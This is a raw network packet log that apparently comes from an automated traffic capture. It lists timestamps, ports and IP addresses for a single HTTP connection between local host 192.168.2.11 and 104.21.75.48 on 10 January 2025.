Jan 10, 2025 19:12:30.872082949 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.872108936 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.879410028 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879435062 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879448891 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879477978 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879496098 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879508972 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879518032 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.879522085 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879534960 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.879565001 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879578114 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879595995 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879610062 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.879637003 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.879637003 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.879651070 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879662991 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879672050 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879695892 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879708052 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879714012 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.879741907 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.879754066 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879771948 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879786968 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879800081 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879808903 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.879808903 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.879833937 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.879864931 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879878044 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879890919 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879901886 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879914045 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.879914999 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879928112 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.879956961 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.879956961 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.879983902 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.880179882 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.880192041 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.880203009 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.880249977 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.880249977 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.880498886 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.880511999 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.880552053 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.880723000 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.880734921 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.880776882 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.881525040 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.881560087 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.884695053 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884712934 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884728909 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884740114 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884752989 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884768009 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884769917 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.884804964 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.884824038 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.884829998 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884840965 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884852886 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884864092 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884875059 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884886026 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884895086 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.884895086 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.884896994 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884910107 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884911060 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.884926081 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884944916 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884948015 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.884948015 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.884955883 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884967089 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884978056 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.884985924 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.884989977 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.885000944 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.885013103 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.885025024 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.885030031 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.885030031 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.885042906 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.885062933 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.885083914 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.958492994 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.958520889 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.958559036 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.958559036 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.958568096 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.958607912 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.958631992 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.958667994 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.958709955 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.958762884 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.958776951 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.958777905 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.958828926 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.958828926 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.958837986 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.958856106 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.958872080 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.958895922 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.958897114 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.958897114 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.958919048 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.958935976 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.958949089 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.958965063 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.958967924 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.958967924 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.958967924 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.958977938 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.958980083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959031105 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959059954 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959300041 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959311008 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959355116 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959363937 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959363937 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959366083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959378958 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959422112 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959433079 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959444046 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959450960 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959450960 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959470987 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959495068 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959506989 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959507942 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959536076 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959546089 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959567070 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959584951 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959595919 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959597111 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959597111 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959597111 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959609985 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959635019 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959647894 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959652901 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959652901 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959657907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959671021 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959683895 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959707022 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959707022 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959736109 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959758043 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959778070 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959789038 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959794998 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959808111 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959819078 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959830999 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959832907 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959832907 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959841967 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959853888 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959867954 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959881067 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959892035 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959908009 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959908009 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959918022 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959927082 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959930897 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959942102 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959958076 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.959973097 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.959985018 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960007906 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960007906 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.960019112 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960031986 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.960047007 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960061073 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960071087 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.960071087 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.960088015 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.960089922 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960103989 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960110903 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.960144997 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.960144997 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.960187912 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960200071 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960210085 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960221052 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960233927 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960243940 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960252047 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.960252047 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.960273027 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.960316896 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.960583925 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960596085 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960608006 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960661888 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.960661888 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.960670948 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960691929 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960704088 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960715055 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960726976 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.960747004 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.960761070 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.960773945 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968060970 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968089104 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968110085 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968112946 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968123913 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968133926 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968137026 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968169928 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968173027 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968183041 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968195915 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968219042 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968236923 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968242884 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968242884 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968252897 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968264103 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968276978 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968285084 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968290091 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968312025 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968319893 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968333006 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968343973 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968369007 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968369007 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968378067 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968390942 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968401909 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968414068 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968419075 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968419075 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968429089 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968442917 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968458891 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968492985 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968492985 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968492985 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968532085 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968785048 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968796968 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968817949 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968831062 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968844891 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968857050 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968858004 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968872070 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968883038 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.968903065 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.968913078 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.969000101 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.969237089 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969257116 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969269037 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969309092 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.969367027 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.969371080 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969391108 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969405890 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969434977 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969434977 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.969449043 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969460964 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969471931 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969482899 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969494104 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969497919 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.969497919 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.969506979 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969520092 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969551086 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969552040 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.969552040 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.969562054 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969574928 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969594955 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.969594955 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.969619989 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.969635963 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969681978 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969682932 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.969695091 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969744921 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969753981 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.969764948 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969779015 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969791889 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.969855070 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.048064947 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048115015 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048134089 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048146963 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048160076 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048171997 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048180103 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.048185110 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048242092 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048254967 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048257113 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.048257113 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.048269033 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048286915 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048299074 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048316956 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.048316956 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.048343897 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.048363924 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048376083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048387051 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048398972 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048405886 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048443079 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.048443079 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.048480034 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048491001 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048502922 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048536062 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.048556089 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.048892975 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048918962 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048932076 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.048938036 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.048950911 CET	80	49726	104.21.75.48	192.168.2.11
